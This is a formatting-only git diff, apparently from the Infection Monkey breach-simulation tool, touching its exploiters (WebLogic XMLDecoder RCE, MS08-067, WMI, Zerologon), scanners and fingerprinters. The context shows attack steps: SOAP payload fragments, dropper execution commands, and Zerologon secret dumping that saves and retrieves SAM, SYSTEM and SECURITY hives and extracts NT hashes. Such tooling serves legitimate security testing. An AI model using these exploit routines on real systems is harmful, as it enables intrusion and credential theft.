@ -460,18 +474,18 @@ class WebRCE(HostExploiter):
self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path
)
command = RUN_MONKEY % {
"monkey_path": path,
"monkey_type": DROPPER_ARG,
"parameters": monkey_cmd,
"monkey_path":path,
"monkey_type":DROPPER_ARG,
"parameters":monkey_cmd,
}
else:
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, self.vulnerable_port
)
command = RUN_MONKEY % {
"monkey_path": path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
"monkey_path":path,
"monkey_type":MONKEY_ARG,
"parameters":monkey_cmd,
}
try:
LOG.info("Trying to execute monkey using command: {}".format(command))
@ -499,7 +513,8 @@ class WebRCE(HostExploiter):
def get_monkey_upload_path(self, url_to_monkey):
"""
Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
:param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
:param url_to_monkey: Hosted monkey's url. egz :
http://localserver:9999/monkey/windows-32.exe
:return: Corresponding monkey path from self.monkey_target_paths
"""
if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey):
@ -522,7 +537,8 @@ class WebRCE(HostExploiter):
return False
except KeyError:
LOG.error(
'Unknown key was found. Please use "linux", "win32" and "win64" keys to initialize '
'Unknown key was found. Please use "linux", "win32" and "win64" keys to '
"initialize "
"custom dict of monkey's destination paths"
)
return False
@ -540,7 +556,7 @@ class WebRCE(HostExploiter):
dest_path = self.get_monkey_upload_path(src_path)
if not dest_path:
return False
return {"src_path": src_path, "dest_path": dest_path}
return {"src_path":src_path, "dest_path":dest_path}
def get_default_dropper_path(self):
"""
@ -577,8 +593,10 @@ class WebRCE(HostExploiter):
def are_vulnerable_urls_sufficient(self):
"""
Determine whether the number of vulnerable URLs is sufficient in order to perform the full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a vulnerable URL is for
Determine whether the number of vulnerable URLs is sufficient in order to perform the
full attack.
Often, a single URL will suffice. However, in some cases (e.g. the Drupal exploit) a
vulnerable URL is for
single use, thus we need a couple of them.
:return: Whether or not a full attack can be performed using the available vulnerable URLs.
"""

View File

@ -24,8 +24,8 @@ REQUEST_TIMEOUT = 5
EXECUTION_TIMEOUT = 15
# Malicious requests' headers:
HEADERS = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"Content-Type":"text/xml;charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
}
@ -65,7 +65,7 @@ class WebLogic201710271(WebRCE):
def __init__(self, host):
super(WebLogic201710271, self).__init__(
host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"}
host, {"linux":"/tmp/monkey.sh", "win32":"monkey32.exe", "win64":"monkey64.exe"}
)
def get_exploit_config(self):
@ -160,7 +160,8 @@ class WebLogic201710271(WebRCE):
:param command: command itself
:return: Formatted payload
"""
empty_payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
empty_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
@ -195,7 +196,8 @@ class WebLogic201710271(WebRCE):
:param port: Server's port
:return: Formatted payload
"""
generic_check_payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
generic_check_payload = """<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
@ -272,7 +274,8 @@ class WebLogic20192725(WebRCE):
return exploit_config
def execute_remote_monkey(self, url, path, dropper=False):
# Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
# Without delay exploiter tries to launch monkey file that is still finishing up after
# downloading.
time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
@ -289,7 +292,7 @@ class WebLogic20192725(WebRCE):
return False
def check_if_exploitable(self, url):
headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""})
headers = copy.deepcopy(HEADERS).update({"SOAPAction":""})
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
return True
@ -307,7 +310,8 @@ class WebLogic20192725(WebRCE):
"""
empty_payload = """
<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"
xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>

View File

@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = {
"Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows 5.1": WindowsVersion.WindowsXP,
"Windows Server 2003 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
"Windows 5.1":WindowsVersion.WindowsXP,
}
def __init__(self, host):
@ -286,7 +286,7 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
"dropper_path":remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -295,7 +295,7 @@ class Ms08_067_Exploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path": remote_full_path
"monkey_path":remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT
)

View File

@ -66,7 +66,9 @@ class WmiExploiter(HostExploiter):
continue
except socket.error:
LOG.debug(
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
(
"Network error in WMI connection to %r with " % self.host) +
creds_for_logging
)
return False
except Exception as exc:
@ -110,7 +112,7 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path": remote_full_path
"dropper_path":remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -119,7 +121,7 @@ class WmiExploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path": remote_full_path
"monkey_path":remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT
)
@ -142,7 +144,8 @@ class WmiExploiter(HostExploiter):
success = True
else:
LOG.debug(
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, cmdline=%r)",
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
"cmdline=%r)",
remote_full_path,
self.host,
result.ProcessId,

View File

@ -1,6 +1,7 @@
"""
Zerologon, CVE-2020-1472
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and https://github.com/risksense/zerologon/.
Implementation based on https://github.com/dirkjanm/CVE-2020-1472/ and
https://github.com/risksense/zerologon/.
"""
import logging
@ -54,7 +55,8 @@ class ZerologonExploiter(HostExploiter):
else:
LOG.info(
"Exploit not attempted. Target is most likely patched, or an error was encountered."
"Exploit not attempted. Target is most likely patched, or an error was "
"encountered."
)
return False
@ -131,7 +133,8 @@ class ZerologonExploiter(HostExploiter):
self.report_login_attempt(result=False, user=self.dc_name)
_exploited = False
LOG.info(
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something went wrong."
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}. Something "
f"went wrong."
)
return _exploited
@ -194,7 +197,8 @@ class ZerologonExploiter(HostExploiter):
def get_all_user_creds(self) -> List[Tuple[str, Dict]]:
try:
options = OptionsForSecretsdump(
target=f"{self.dc_name}$@{self.dc_ip}", # format for DC account - "NetBIOSName$@0.0.0.0"
target=f"{self.dc_name}$@{self.dc_ip}",
# format for DC account - "NetBIOSName$@0.0.0.0"
target_ip=self.dc_ip,
dc_ip=self.dc_ip,
)
@ -221,7 +225,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
f"Exception occurred while dumping secrets to get some username and its password's NT hash: {str(e)}"
f"Exception occurred while dumping secrets to get some username and its "
f"password's NT hash: {str(e)}"
)
return None
@ -248,9 +253,9 @@ class ZerologonExploiter(HostExploiter):
user_RID, lmhash, nthash = parts_of_secret[1:4]
self._extracted_creds[user] = {
"RID": int(user_RID), # relative identifier
"lm_hash": lmhash,
"nt_hash": nthash,
"RID":int(user_RID), # relative identifier
"lm_hash":lmhash,
"nt_hash":nthash,
}
def store_extracted_creds_for_exploitation(self) -> None:
@ -269,11 +274,11 @@ class ZerologonExploiter(HostExploiter):
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
self.exploit_info["credentials"].update(
{
user: {
"username": user,
"password": "",
"lm_hash": lmhash,
"ntlm_hash": nthash,
user:{
"username":user,
"password":"",
"lm_hash":lmhash,
"ntlm_hash":nthash,
}
}
)
@ -310,7 +315,8 @@ class ZerologonExploiter(HostExploiter):
except Exception as e:
LOG.info(
f"Exception occurred while dumping secrets to get original DC password's NT hash: {str(e)}"
f"Exception occurred while dumping secrets to get original DC password's NT "
f"hash: {str(e)}"
)
finally:
@ -325,7 +331,8 @@ class ZerologonExploiter(HostExploiter):
)
wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes),
domain=self.dc_ip
)
remote_shell = wmiexec.get_remote_shell()
@ -339,7 +346,8 @@ class ZerologonExploiter(HostExploiter):
+ "reg save HKLM\\SECURITY security.save"
)
# Get HKLM keys locally (can't run these together because it needs to call do_get()).
# Get HKLM keys locally (can't run these together because it needs to call
# do_get()).
remote_shell.onecmd("get system.save")
remote_shell.onecmd("get sam.save")
remote_shell.onecmd("get security.save")

View File

@ -132,8 +132,10 @@ class DumpSecrets:
self.connect()
except Exception as e:
if os.getenv("KRB5CCNAME") is not None and self.__do_kerberos is True:
# SMBConnection failed. That might be because there was no way to log into the
# target system. We just have a last resort. Hope we have tickets cached and that they
# SMBConnection failed. That might be because there was no way to
# log into the
# target system. We just have a last resort. Hope we have tickets
# cached and that they
# will work
LOG.debug(
"SMBConnection didn't work, hoping Kerberos will help (%s)"
@ -162,11 +164,13 @@ class DumpSecrets:
and os.getenv("KRB5CCNAME") is not None
and self.__do_kerberos is True
):
# Giving some hints here when SPN target name validation is set to something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs different to cifs/.
# Giving some hints here when SPN target name validation is set to
# something different to Off.
# This will prevent establishing SMB connections using TGS for SPNs
# different to cifs/.
LOG.error(
"Policy SPN target name validation might be restricting full DRSUAPI dump."
+ "Try -just-dc-user"
"Policy SPN target name validation might be restricting full "
"DRSUAPI dump." + "Try -just-dc-user"
)
else:
LOG.error("RemoteOperations failed: %s" % str(e))
@ -208,7 +212,8 @@ class DumpSecrets:
LOG.debug(traceback.print_exc())
LOG.error("LSA hashes extraction failed: %s" % str(e))
# NTDS Extraction we can try regardless of RemoteOperations failing. It might still work.
# NTDS Extraction we can try regardless of RemoteOperations failing. It might
# still work.
if self.__is_remote is True:
if self.__use_VSS_method and self.__remote_ops is not None:
NTDS_file_name = self.__remote_ops.saveNTDS()
@ -231,7 +236,8 @@ class DumpSecrets:
except Exception as e:
LOG.debug(traceback.print_exc())
if str(e).find("ERROR_DS_DRA_BAD_DN") >= 0:
# We don't store the resume file if this error happened, since this error is related to lack
# We don't store the resume file if this error happened, since this error
# is related to lack
# of enough privileges to access DRSUAPI.
resume_file = self.__NTDS_hashes.getResumeSessionFile()
if resume_file is not None:
@ -239,7 +245,8 @@ class DumpSecrets:
LOG.error(e)
if self.__use_VSS_method is False:
LOG.error(
"Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter"
"Something wen't wrong with the DRSUAPI approach. Try again with "
"-use-vss parameter"
)
self.cleanup()
except (Exception, KeyboardInterrupt) as e:

View File

@ -35,9 +35,11 @@ class OptionsForSecretsdump:
target=None,
target_ip=None,
):
# dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in ../zerologon.py
# dc_ip is assigned in get_original_pwd_nthash() and get_admin_pwd_hashes() in
# ../zerologon.py
self.dc_ip = dc_ip
# just_dc becomes False, and sam, security, and system are assigned in get_original_pwd_nthash() in ../zerologon.py
# just_dc becomes False, and sam, security, and system are assigned in
# get_original_pwd_nthash() in ../zerologon.py
self.just_dc = just_dc
self.sam = sam
self.security = security

View File

@ -134,8 +134,10 @@ class RemoteShell(cmd.Cmd):
self.__outputBuffer += data.decode(self.CODEC)
except UnicodeDecodeError:
LOG.error(
"Decoding error detected, consider running chcp.com at the target,\nmap the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute wmiexec.py "
"Decoding error detected, consider running chcp.com at the target,"
"\nmap the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings\nand "
"then execute wmiexec.py "
"again with -codec and the corresponding codec"
)
self.__outputBuffer += data.decode(self.CODEC, errors="replace")

View File

@ -22,23 +22,24 @@ __author__ = "itamar"
LOG = None
LOG_CONFIG = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {
"format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s"
"version":1,
"disable_existing_loggers":False,
"formatters":{
"standard":{
"format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s"
},
},
"handlers": {
"console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
"file": {
"class": "logging.FileHandler",
"level": "DEBUG",
"formatter": "standard",
"filename": None,
"handlers":{
"console":{"class":"logging.StreamHandler", "level":"DEBUG", "formatter":"standard"},
"file":{
"class":"logging.FileHandler",
"level":"DEBUG",
"formatter":"standard",
"filename":None,
},
},
"root": {"level": "DEBUG", "handlers": ["console"]},
"root":{"level":"DEBUG", "handlers":["console"]},
}
@ -71,8 +72,8 @@ def main():
print("Error loading config: %s, using default" % (e,))
else:
print(
"Config file wasn't supplied and default path: %s wasn't found, using internal default"
% (config_file,)
"Config file wasn't supplied and default path: %s wasn't found, using internal "
"default" % (config_file,)
)
print(
@ -104,7 +105,8 @@ def main():
if WormConfiguration.use_file_logging:
if os.path.exists(log_path):
# If log exists but can't be removed it means other monkey is running. This usually happens on upgrade
# If log exists but can't be removed it means other monkey is running. This usually
# happens on upgrade
# from 32bit to 64bit monkey on Windows. In all cases this shouldn't be a problem.
try:
os.remove(log_path)
@ -126,7 +128,8 @@ def main():
sys.excepthook = log_uncaught_exceptions
LOG.info(
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__,
os.getpid()
)
LOG.info(f"version: {get_version()}")

View File

@ -100,7 +100,8 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server)
else:
LOG.debug(
"Default server: %s is already in command servers list" % self._default_server
"Default server: %s is already in command servers list" %
self._default_server
)
def start(self):
@ -219,7 +220,7 @@ class InfectionMonkey(object):
# Order exploits according to their type
self._exploiters = sorted(
self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value
self._exploiters, key=lambda exploiter_:exploiter_.EXPLOIT_TYPE.value
)
host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
@ -227,7 +228,8 @@ class InfectionMonkey(object):
host_exploited = True
VictimHostTelem("T1210", ScanStatus.USED, machine=machine).send()
if exploiter.RUNS_AGENT_ON_SUCCESS:
break # if adding machine to exploited, won't try other exploits on it
break # if adding machine to exploited, won't try other exploits
# on it
if not host_exploited:
self._fail_exploitation_machines.add(machine)
VictimHostTelem("T1210", ScanStatus.SCANNED, machine=machine).send()
@ -244,12 +246,14 @@ class InfectionMonkey(object):
elif not WormConfiguration.alive:
LOG.info("Marked not alive from configuration")
# if host was exploited, before continue to closing the tunnel ensure the exploited host had its chance to
# if host was exploited, before continue to closing the tunnel ensure the exploited
# host had its chance to
# connect to the tunnel
if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info(
"Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
"Sleeping %d seconds for exploited machines to connect to tunnel",
time_to_sleep
)
time.sleep(time_to_sleep)
@ -261,7 +265,8 @@ class InfectionMonkey(object):
except PlannedShutdownException:
LOG.info(
"A planned shutdown of the Monkey occurred. Logging the reason and finishing execution."
"A planned shutdown of the Monkey occurred. Logging the reason and finishing "
"execution."
)
LOG.exception("Planned shutdown, reason:")
@ -341,7 +346,7 @@ class InfectionMonkey(object):
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
subprocess.Popen(
DELAY_DELETE_CMD % {"file_path": sys.executable},
DELAY_DELETE_CMD % {"file_path":sys.executable},
stdin=None,
stdout=None,
stderr=None,
@ -393,7 +398,8 @@ class InfectionMonkey(object):
return True
else:
LOG.info(
"Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
"Failed exploiting %r with exploiter %s", machine,
exploiter.__class__.__name__
)
except ExploitingVulnerableMachineError as exc:
LOG.error(
@ -452,7 +458,8 @@ class InfectionMonkey(object):
"""
if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException(
"Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
"Monkey couldn't find server with {} default tunnel.".format(
self._default_tunnel)
)
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)

View File

@ -58,7 +58,7 @@ class WinAdvFirewall(FirewallApp):
def add_firewall_rule(
self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
):
netsh_args = {"name": name, "dir": direction, "action": action, "program": program}
netsh_args = {"name":name, "dir":direction, "action":action, "program":program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("advfirewall firewall add rule", netsh_args):
@ -70,7 +70,7 @@ class WinAdvFirewall(FirewallApp):
return None
def remove_firewall_rule(self, name="Firewall", **kwargs):
netsh_args = {"name": name}
netsh_args = {"name":name}
netsh_args.update(kwargs)
try:
@ -132,7 +132,7 @@ class WinFirewall(FirewallApp):
program=sys.executable,
**kwargs,
):
netsh_args = {"name": name, "mode": mode, "program": program}
netsh_args = {"name":name, "mode":mode, "program":program}
netsh_args.update(kwargs)
try:
@ -153,7 +153,7 @@ class WinFirewall(FirewallApp):
program=sys.executable,
**kwargs,
):
netsh_args = {"program": program}
netsh_args = {"program":program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("firewall delete %s" % rule, netsh_args):

View File

@ -52,6 +52,7 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
@ -59,10 +60,12 @@ if is_windows_os():
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")
@ -88,7 +91,8 @@ else:
continue
try:
ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", iff))
except IOError: # interface is present in routing tables but does not have any assigned IP
except IOError: # interface is present in routing tables but does not have any
# assigned IP
ifaddr = "0.0.0.0"
else:
addrfamily = struct.unpack("h", ifreq[16:18])[0]

View File

@ -49,22 +49,21 @@ class MSSQLFinger(HostFinger):
data, server = sock.recvfrom(self.BUFFER_SIZE)
except socket.timeout:
LOG.info(
"Socket timeout reached, maybe browser service on host: {0} doesnt exist".format(
host
)
"Socket timeout reached, maybe browser service on host: {0} doesnt "
"exist".format(host)
)
sock.close()
return False
except socket.error as e:
if e.errno == errno.ECONNRESET:
LOG.info(
"Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.".format(
host
)
"Connection was forcibly closed by the remote host. The host: {0} is "
"rejecting the packet.".format(host)
)
else:
LOG.error(
"An unknown socket error occurred while trying the mssql fingerprint, closing socket.",
"An unknown socket error occurred while trying the mssql fingerprint, "
"closing socket.",
exc_info=True,
)
sock.close()
@ -82,7 +81,8 @@ class MSSQLFinger(HostFinger):
if len(instance_info) > 1:
host.services[self._SCANNED_SERVICE][instance_info[1]] = {}
for i in range(1, len(instance_info), 2):
# Each instance's info is nested under its own name, if there are multiple instances
# Each instance's info is nested under its own name, if there are multiple
# instances
# each will appear under its own name
host.services[self._SCANNED_SERVICE][instance_info[1]][
instance_info[i - 1]

View File

@ -44,9 +44,11 @@ class NetworkScanner(object):
def _get_inaccessible_subnets_ips(self):
"""
For each of the machine's IPs, checks if it's in one of the subnets specified in the
'inaccessible_subnets' config value. If so, all other subnets in the config value shouldn't be accessible.
'inaccessible_subnets' config value. If so, all other subnets in the config value
shouldn't be accessible.
All these subnets are returned.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is running on.
:return: A list of subnets that shouldn't be accessible from the machine the monkey is
running on.
"""
subnets_to_scan = []
if len(WormConfiguration.inaccessible_subnets) > 1:
@ -54,7 +56,8 @@ class NetworkScanner(object):
if NetworkScanner._is_any_ip_in_subnet(
[str(x) for x in self._ip_addresses], subnet_str
):
# If machine has IPs from 2 different subnets in the same group, there's no point checking the other
# If machine has IPs from 2 different subnets in the same group, there's no
# point checking the other
# subnet.
for other_subnet_str in WormConfiguration.inaccessible_subnets:
if other_subnet_str == subnet_str:
@ -74,9 +77,12 @@ class NetworkScanner(object):
:param stop_callback: A callback to check at any point if we should stop scanning
:return: yields a sequence of VictimHost instances
"""
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be the best decision
# However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (pps and bw)
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher than CPU core size
# We currently use the ITERATION_BLOCK_SIZE as the pool size, however, this may not be
# the best decision
# However, the decision what ITERATION_BLOCK_SIZE also requires balancing network usage (
# pps and bw)
# Because we are using this to spread out IO heavy tasks, we can probably go a lot higher
# than CPU core size
# But again, balance
pool = Pool(ITERATION_BLOCK_SIZE)
victim_generator = VictimHostGenerator(

View File

@ -59,7 +59,8 @@ class PingScanner(HostScanner, HostFinger):
ttl = int(regex_result.group(0))
if ttl <= LINUX_TTL:
host.os["type"] = "linux"
else: # as far we we know, could also be OSX/BSD but lets handle that when it comes up.
else: # as far we we know, could also be OSX/BSD but lets handle that when it
# comes up.
host.os["type"] = "windows"
host.icmp = True

View File

@ -17,21 +17,21 @@ class PostgreSQLFinger(HostFinger):
# Class related consts
_SCANNED_SERVICE = "PostgreSQL"
POSTGRESQL_DEFAULT_PORT = 5432
CREDS = {"username": ID_STRING, "password": ID_STRING}
CREDS = {"username":ID_STRING, "password":ID_STRING}
CONNECTION_DETAILS = {
"ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl": "SSL connections can be made by selected hosts only OR "
"ssl_conf":"SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n",
"selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n",
"only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EX_SUBSTRINGS = {
"no_auth": "password authentication failed",
"no_entry": "entry for host", # "no pg_hba.conf entry for host" but filename may be diff
"no_auth":"password authentication failed",
"no_entry":"entry for host", # "no pg_hba.conf entry for host" but filename may be diff
}
def get_host_fingerprint(self, host):
@ -51,12 +51,14 @@ class PostgreSQLFinger(HostFinger):
self.init_service(host.services, self._SCANNED_SERVICE, self.POSTGRESQL_DEFAULT_PORT)
host.services[self._SCANNED_SERVICE]["communication_encryption_details"] = (
"The PostgreSQL server was unexpectedly accessible with the credentials - "
+ f"user: '{self.CREDS['username']}' and password: '{self.CREDS['password']}'. Is this a honeypot?"
+ f"user: '{self.CREDS['username']}' and password: '"
f"{self.CREDS['password']}'. Is this a honeypot?"
)
return True
except psycopg2.OperationalError as ex:
# try block will throw an OperationalError since the credentials are wrong, which we then analyze
# try block will throw an OperationalError since the credentials are wrong, which we
# then analyze
try:
exception_string = str(ex)

View File

@ -68,14 +68,16 @@ class SMBNegoFingerData(Packet):
("separator1", b"\x02"),
(
"dialect1",
b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00",
b"\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d"
b"\x20\x31\x2e\x30\x00",
),
("separator2", b"\x02"),
("dialect2", b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
("separator3", b"\x02"),
(
"dialect3",
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72"
b"\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00",
),
("separator4", b"\x02"),
("dialect4", b"\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
@ -104,12 +106,18 @@ class SMBSessionFingerData(Packet):
("bcc1", ""),
(
"Data",
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c"
b"\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00"
b"\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53"
b"\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20"
b"\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
b"\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00",
),
]
@ -161,7 +169,7 @@ class SMBFinger(HostFinger):
os_version, service_client = tuple(
[
e.replace(b"\x00", b"").decode()
for e in data[47 + length :].split(b"\x00\x00\x00")[:2]
for e in data[47 + length:].split(b"\x00\x00\x00")[:2]
]
)

View File

@ -22,7 +22,8 @@ class TcpScanner(HostScanner, HostFinger):
def get_host_fingerprint(self, host, only_one_port=False):
"""
Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration.
Scans a target host to see if it's alive using the tcp_target_ports specified in the
